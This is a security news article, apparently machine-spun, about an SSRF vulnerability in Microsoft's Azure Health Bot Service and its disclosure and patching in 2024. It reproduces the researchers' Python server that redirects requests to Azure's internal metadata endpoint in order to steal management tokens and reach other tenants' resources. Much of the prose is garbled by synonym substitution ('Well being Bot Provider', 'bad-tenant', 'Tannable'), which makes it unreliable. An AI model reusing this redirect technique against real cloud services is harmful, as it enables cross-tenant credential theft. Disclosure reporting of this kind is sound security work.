Critical SSRF Vulnerability in Microsoft Azure Let Hackers Compromise Health Bot Services

Tenable Learn has uncovered foremost security vulnerabilities in Microsoft’s Azure Well being Bot Provider, a cloud platform designed to enable healthcare professionals to deploy AI-powered virtual health assistants.

The Azure AI Well being Bot Provider is a cloud-primarily based completely platform designed for healthcare organizations. It permits developers to gather and deploy AI-pushed virtual health assistants, which attend streamline processes and prick bills whereas ensuring compliance with enterprise requirements.

These vulnerabilities allowed unauthorized get entry to to bad-tenant resources, raising issues about in all probability lateral motion to various resources inner the provider.

Tenable’s investigation serious about a characteristic known as “Knowledge Connections,” which allows the Azure Well being Bot Provider to work along with exterior recordsdata sources. While checking out these recordsdata connections, researchers stumbled on a server-aspect put a question to forgery (SSRF) vulnerability.

This vulnerability enabled them to avoid unusual security filters and get entry to tranquil inner endpoints, akin to Azure’s Internal Metadata Provider (IMDS).

Technical Analysis

The SSRF vulnerability used to be exploited by configuring a recordsdata connection to redirect requests to an exterior host controlled by the Attackers.

The host used to be blueprint as much as answer with a 301 redirect to the IMDS endpoint, allowing the researchers to develop a sound metadata response. Using this response, they obtained an get entry to token for administration.azure.com and subsequently listed subscriptions and resources belonging to various customers.

The Tannable researchers employed a Python script to blueprint up the HTTP server that facilitated the SSRF assault:

#!/usr/bin/python3 from http.server import HTTPServer, BaseHTTPRequestHandler  def servePage(s, hverb):     s.protocol_version = 'HTTP/1.1'     s.server_version = 'Microsoft-IIS/8.5'     s.sys_version = ''     s.send_response(301)     s.send_header('Location', 'http://169.254.169.254/metadata/instance?api-version=2021-12-13')     s.end_headers()     message = ""     s.wfile.write(bytes(message, "utf8"))     return  class StaticServer(BaseHTTPRequestHandler):     def do_GET(self):         servePage(self, "GET")         return  def main(server_class=HTTPServer, handler_class=StaticServer, port=80):     server_address = ('', port)     httpd = server_class(server_address, handler_class)     httpd.serve_forever()  main()

By configuring a recordsdata connection inner the provider’s scenario editor, attackers could well additionally specify an exterior host under their control.

This host used to be configured to answer to requests with a 301 redirect response destined for Azure’s IMDS. Using this strategy, attackers could well additionally develop a precise metadata response and subsequently develop an get entry to token for administration.azure.com.

Response and Mitigation

Upon discovering the vulnerabilities, Tenable abruptly reported them to Microsoft’s Security Response Heart (MSRC) on June 17, 2024. MSRC rapidly acknowledged the tell and started imposing fixes.

By July 2, Microsoft confirmed that each one affected companies and products and areas had been patched, with no buyer action required.

Tenable later identified one more vulnerable endpoint for validating FHIR endpoints’ recordsdata connections. Even supposing this endpoint used to be at chance of a the same assault, it did not allow bad-tenant get entry to. This 2nd trouble used to be reported on July 9, with fixes done by July 12.

These vulnerabilities underscore the importance of robust internet applications and cloud security mechanisms, even in AI-powered companies and products.

While no proof means that malicious actors exploited these vulnerabilities, the incident highlights the necessity for continuous security auditing and proactive vulnerability administration.